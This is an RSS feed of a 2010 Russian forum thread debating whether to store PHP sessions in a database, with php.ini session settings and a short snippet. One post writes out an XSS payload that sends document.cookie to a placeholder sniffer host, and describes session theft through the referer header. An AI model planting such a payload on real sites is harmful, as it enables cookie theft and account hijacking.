Sessions in DB - Visavi.net
https://visavi.net/
RSS - Visavi.nethttps://visavi.net/assets/img/images/logo_small.pngRSS - Visavi.net
https://visavi.net/
[email protected] (admin)[email protected] (admin)Wed, 15 Jan 2025 18:33:34 +0300но если быть осторожным и не переходить на левые ссылки, то боятся нечего <img src="https://visavi.net/uploads/stickers/smile.gif" alt="smile">
https://visavi.net/topics/12592/225149
Sessions in DB deleteSun, 15 Aug 2010 13:57:34 +0400Сообщенияhttps://visavi.net/topics/12592/225149в случае с перемеными, найдя хss и вставив<br>
<br>
<script>img = new Image(); img.src = "СНИФФЕР"+ document.cookie;</script><br>
<br>
куки улеят, но не у всех браузеров это вообще реально))) а вот в твоем случае достаточно getenv("HTTP_REFERER"); а это у всех сработает, даж дыры ненужны, только перешел на страницу, и усе, доступ у хацкера есть
https://visavi.net/topics/12592/225137
Sessions in DB deleteSun, 15 Aug 2010 13:52:28 +0400Сообщенияhttps://visavi.net/topics/12592/225137да какая разница где ты сессию хранишь, от того что ты эти переменые не юзаеш, дополнительная уязвимость получается, что б украсть сессию надо найти пассивную xss, а уж потом попытаться снифером украсть куки, а в твоем случае надо лиш украсть страницу с куками <img src="https://visavi.net/uploads/stickers/smile.gif" alt="smile"> это легче.. такой ж косяк у почты мейла, и у форума вена вроди, у фтп некоторых)))
https://visavi.net/topics/12592/225107
Sessions in DB deleteSun, 15 Aug 2010 13:40:49 +0400Сообщенияhttps://visavi.net/topics/12592/225107session.save_path""<br>
session.name"PHPSESSID"<br>
session.save_handler"files"<br>
session.auto_start"0"<br>
session.gc_probability"1"<br>
session.gc_divisor"100"<br>
Доступна с PHP 4.3.2.<br>
session.gc_maxlifetime"1440"<br>
session.serialize_handler"php"<br>
session.cookie_lifetime"0"<br>
session.cookie_path"/"<br>
session.cookie_domain""<br>
session.cookie_secure""<br>
<br>
session.use_cookies"1"<br>
session.use_only_cookies"0"<br>
Доступна с PHP 4.3.0.<br>
session.referer_check""<br>
session.entropy_file""<br>
session.entropy_length"0"<br>
session.cache_limiter"nocache"<br>
session.cache_expire"180"<br>
session.use_trans_sid"0"<br>
Доступна с PHP 4.0.3.<br>
session.bug_compat_42"1"<br>
Доступна с PHP 4.3.0.<br>
session.bug_compat_warn"1"<br>
Доступна с PHP 4.3.0.<br>
session.hash_function"0"<br>
Доступна с PHP 5.0.0.<br>
session.hash_bits_per_character"4"<br>
Доступна с PHP 5.0.0.<br>
url_rewriter.tags"a=href,area=href,frame=src,form=,fieldset="<br>
<br>
стандартный набор, думаешь стоит тратить время на написание стольких педалей к велосипеду?))
https://visavi.net/topics/12592/225103
Sessions in DB ramzesSun, 15 Aug 2010 13:39:24 +0400Сообщенияhttps://visavi.net/topics/12592/225103велосиппедов много всяких раэных, хороших, нормальных и безобразных...
https://visavi.net/topics/12592/225076
Sessions in DB МаксимSun, 15 Aug 2010 13:27:20 +0400Сообщенияhttps://visavi.net/topics/12592/225076путем велосипедиста)
https://visavi.net/topics/12592/225067
Sessions in DB DmitryDickSun, 15 Aug 2010 13:24:14 +0400Сообщенияhttps://visavi.net/topics/12592/225067мы пойдём другим путём...
https://visavi.net/topics/12592/225054
Sessions in DB МаксимSun, 15 Aug 2010 13:18:52 +0400Сообщенияhttps://visavi.net/topics/12592/225054куки и сесии ты и сам можешь удалять.<br>
родные методы быстрее, и если не ошибаюсь есть готовые решения в php для альтернативного хранения чтения и записи сессий хоть в файлы хоть в бд
https://visavi.net/topics/12592/224990
Sessions in DB ramzesSun, 15 Aug 2010 12:45:28 +0400Сообщенияhttps://visavi.net/topics/12592/22499014. <strong>ramzes</strong>, мне так кажется удобней и проще у каждой сессии есть life_time - типа кукисов и тд... Мне так проще с данными работать, не знаю кому как. Решил "отречся" о с $_SESSION и $_COOKIES, которые не очистят...
https://visavi.net/topics/12592/224941
Sessions in DB МаксимSun, 15 Aug 2010 12:11:07 +0400Сообщенияhttps://visavi.net/topics/12592/224941автор, а зачем тебе это?<br>
большей защиты все равно не добьешься
https://visavi.net/topics/12592/224933
Sessions in DB ramzesSun, 15 Aug 2010 12:07:37 +0400Сообщенияhttps://visavi.net/topics/12592/224933и к тому-же я не утверждал что это какаято особенность.<br>
<br>
и не все хранят сесси в бд.
https://visavi.net/topics/12592/224923
Sessions in DB МаксимSun, 15 Aug 2010 12:03:08 +0400Сообщенияhttps://visavi.net/topics/12592/224923не юзаю переменные $_SESSION. Всё хранится в бд.<br>
<br>
<pre class="prettyprint">
<?php
session_name('SID');
session_start();
?>
</pre> и ишо несколько конфигов в .htaccess.<br>
<br>
окромя этого ничего не упоминается
https://visavi.net/topics/12592/224918
Sessions in DB МаксимSun, 15 Aug 2010 12:01:18 +0400Сообщенияhttps://visavi.net/topics/12592/22491810, ну автор вроде как утверждает что никаких сессий не юзает ($_SESSION нет ни одной!), интересно было бы послушать что он ответит))
https://visavi.net/topics/12592/224885
Sessions in DB KOZZSun, 15 Aug 2010 10:55:24 +0400Сообщенияhttps://visavi.net/topics/12592/224885<blockquote class="blockquote"><strong>БелладонН eGo</strong> (15 Августа 2010 / 10:40)<br>
интересует вопрос из поста #6 ??</blockquote>
<img src="https://visavi.net/uploads/stickers/D.gif" alt="D"> ..просто если исходить из слов автора, это ни какая не особенность, так все хранят данные в базе <img src="https://visavi.net/uploads/stickers/smile.gif" alt="smile"> а сессион как был так и будит.
https://visavi.net/topics/12592/224876
Sessions in DB deleteSun, 15 Aug 2010 10:49:38 +0400Сообщенияhttps://visavi.net/topics/12592/224876интересует вопрос из поста #6 ??
https://visavi.net/topics/12592/224874
Sessions in DB KOZZSun, 15 Aug 2010 10:40:52 +0400Сообщенияhttps://visavi.net/topics/12592/224874